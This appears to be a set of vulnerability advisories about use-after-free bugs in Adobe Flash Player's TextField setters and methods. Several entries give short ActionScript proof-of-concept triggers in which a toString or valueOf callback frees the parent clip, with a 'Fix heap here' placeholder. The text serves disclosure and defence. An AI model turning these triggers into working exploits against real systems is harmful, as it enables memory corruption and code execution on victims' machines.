There is a use-after-free in the TextField.tabIndex setter. If the integer parameter is an object with valueOf defined, then it can free the TextField's parent, leading to a use-after-free. A minimal PoC follows: var times = 0; var mc = this.createEmptyMovieClip('mc', 1); var tf = mc.createTextField('tf', 2, 1, 1, 100, 100); tf.text = 'hello'; tf.tabIndex = {valueOf : func}; function func(){ if(times == 0){ times++; return; } mc.removeMovieClip(); // Fix heap here return 0x77777777; }
There is a use-after-free in the TextField.text setter. If the text the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows: var mc = this.createEmptyMovieClip('mc', 101); var tf = mc.createTextField('tf', 102, 1, 1, 100, 100); tf.text = {toString : func}; function func(){ mc.removeMovieClip(); // Fix heap here return 'natalie'; } A sample swf and fla are attached.
There is a use-after-free in the TextField.type setter. If the type the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows: var mc = this.createEmptyMovieClip('mc', 101); var tf = mc.createTextField('tf', 102, 1, 1, 100, 100); tf.type = {toString : func}; function func(){ mc.removeMovieClip(); // Fix heap here return 'input'; } A sample swf and fla are attached.
There is a use-after-free in the TextField.htmlText setter. If the htmlText the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows: var mc = this.createEmptyMovieClip('mc', 101); var tf = mc.createTextField('tf', 102, 1, 1, 100, 100); tf.htmlText = {toString : func}; function func(){ mc.removeMovieClip(); // Fix heap here return '<b>hello</b>'; }
There is a use-after-free in the TextField.variable setter. If the variable name that is added is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows: var mc = this.createEmptyMovieClip('mc', 101); var tf = mc.createTextField('tf', 102, 1, 1, 100, 100); tf.variable = {toString : func}; function func(){ mc.removeMovieClip(); // Fix heap here return 'myvar'; }
There is a use-after-free vulnerability in the TextField.replaceText function of Adobe Flash Player. If the function is called with a string parameter with toString defined, or an integer parameter with valueOf defined, the parent object of the TextField can be used after it is freed. This can be exploited to execute arbitrary code. Proof of Concept code is provided in the description.
There is a use-after-free in TextField.replaceSel. If the string parameter of the method is set to an object with toString defined, this method can delete the TextField's parent, leading to a use-after-free. A minimal PoC is provided in the text.
There is a use-after-free vulnerability in the TextField thickness setter. If the thickness parameter is an object with valueOf set to a function which frees the TextField parent, it is used after it is freed. A proof-of-concept exploit is provided which creates a TextField and sets the thickness parameter to an object with a valueOf function which frees the TextField parent.
There is a use-after-free in the TextField sharpness setter. If the sharpness parameter is an object with valueOf set to a function which frees the TextField parent, it is used after it is freed. A minimal PoC is as follows: var times = 0; var mc = this.createEmptyMovieClip('mc', 101); var tf = mc.createTextField('tf', 102, 1, 1, 100, 100); tf.sharpness = {valueOf : func}; function func(){ if(times == 0){ times++; return 0; } mc.removeMovieClip(); // Fix heap here return 0; }
There is a use-after-free in Selection.SetSelection. If it is called with a number parameter, which is an object with valueOf defined, and this function frees the parent of the TextField parameter, the object is used after it is freed.
Services By CQR